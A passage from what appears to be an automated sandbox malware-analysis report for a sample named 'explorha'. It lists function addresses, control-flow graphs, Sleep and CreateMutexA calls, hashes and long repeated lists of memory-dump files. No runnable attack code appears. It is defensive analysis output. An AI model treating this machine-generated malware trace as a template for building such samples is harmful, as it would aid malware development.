                                                                                                                                                                                                                                        • Opcode ID: 14e13933b342fcbfd142f665bb237e88de3d689147a0592a029cf4a1e29306f3
                                                                                                                                                                                                                                        • Instruction ID: 1b17d3ad8651c89c5be3a85d7ab20b11ce7575fccfaa608f057d78709785c97a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 14e13933b342fcbfd142f665bb237e88de3d689147a0592a029cf4a1e29306f3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D310471600348EBEB08DB6CCC997ADB7B2EB86314F208718E815D72D2D7BD59808762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070958C Relevance: 3.1, APIs: 2, Instructions: 106sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 229 70958c-7095aa 230 7095d8-7095f7 229->230 231 7095ac-7095b8 229->231 234 709625-70a3e6 call 719750 230->234 235 7095f9-709605 230->235 232 7095ba-7095c8 231->232 233 7095ce-7095d5 call 71ecf8 231->233 232->233 237 70a3e7 232->237 233->230 239 709607-709615 235->239 240 70961b-709622 call 71ecf8 235->240 242 70a423-70a466 Sleep CreateMutexA 237->242 243 70a3e7 call 7382fa 237->243 239->237 239->240 240->234 243->242
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 620dfaef22e54693a0489d4ed0ca1b64bb2d7d1e933f636a09e1e27d82f31d56
                                                                                                                                                                                                                                        • Instruction ID: 1a379052d6876eb2b9a8a42474ccfd82aff817ae5393feb8bfc5a74f63eca5ed
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 620dfaef22e54693a0489d4ed0ca1b64bb2d7d1e933f636a09e1e27d82f31d56
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF212971604244DBFB18DF6CCD897ADFBA2EB45304F208718E915973D2D7BD59808752
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0070A326 Relevance: 3.1, APIs: 2, Instructions: 91sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 271 70a326-70a33e 272 70a340-70a34c 271->272 273 70a36c-70a36e 271->273 274 70a362-70a369 call 71ecf8 272->274 275 70a34e-70a35c 272->275 276 70a370-70a377 273->276 277 70a379-70a381 call 7078b0 273->277 274->273 275->274 278 70a41e-70a458 call 7382fa Sleep CreateMutexA 275->278 280 70a3bb-70a3e6 call 719750 276->280 288 70a383-70a38b call 7078b0 277->288 289 70a3b4-70a3b6 277->289 292 70a45e-70a466 278->292 288->289 293 70a38d-70a395 call 7078b0 288->293 289->280 293->289 297 70a397-70a39f call 7078b0 293->297 297->289 300 70a3a1-70a3a9 call 7078b0 297->300 300->289 303 70a3ab-70a3b2 300->303 303->280
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 42af1f032d9ba2581048245d7d9b6326d8cd02fba328ef6ae591617b82aaecef
                                                                                                                                                                                                                                        • Instruction ID: 4c35e5183dba0951823c646c83c5d0d932ebdc5d725f855eb007a6cf6d6e6d39
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42af1f032d9ba2581048245d7d9b6326d8cd02fba328ef6ae591617b82aaecef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E210870644304F7F728AB6C884F76DF6D2EF41300F208715E941C62D2CABD5880C267
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00709E1F Relevance: 3.1, APIs: 2, Instructions: 91sleepsynchronizationCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 251 709e1f-709e2b 252 709e41-709e6a call 71ecf8 251->252 253 709e2d-709e3b 251->253 259 709e98-70a3e6 call 719750 252->259 260 709e6c-709e78 252->260 253->252 254 70a40a 253->254 256 70a423-70a466 Sleep CreateMutexA 254->256 257 70a40a call 7382fa 254->257 257->256 263 709e7a-709e88 260->263 264 709e8e-709e95 call 71ecf8 260->264 263->254 263->264 264->259
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131500106.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131526562.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131553521.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131576497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131600115.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131626714.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131653420.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131676429.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131750216.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131815918.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131876230.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131903531.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131929428.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131983084.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2132009698.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: cfc74b21adfcdd153e0174b5e1dbff963f8ed3fa81fc10b7d39292b9416ce819
                                                                                                                                                                                                                                        • Instruction ID: 975728bbbd3e5a71c2e0219006196cc8ad82a69368422ca0af57e75d47495ff1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfc74b21adfcdd153e0174b5e1dbff963f8ed3fa81fc10b7d39292b9416ce819
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46210872604344EBFB08DB6CDC897ADB7A2EB86311F204728E915D62D2D7BD59808752
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 00744330 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 450COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130649596.0000000000700000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130672754.0000000000764000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130744577.0000000000769000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130767970.000000000076B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130792007.0000000000775000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130815173.0000000000776000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130838465.0000000000777000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130944623.00000000008D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130968284.00000000008D3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2130992106.00000000008E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131015605.00000000008E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131038035.00000000008EF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131088103.00000000008F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131112645.00000000008F9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131137331.0000000000902000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131162505.0000000000909000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131193467.000000000091D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131218609.000000000091F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131242429.0000000000920000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131268887.0000000000932000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131300586.000000000094F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131327253.0000000000950000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131350972.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131375198.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131401886.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131426997.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131452167.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2131475821.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
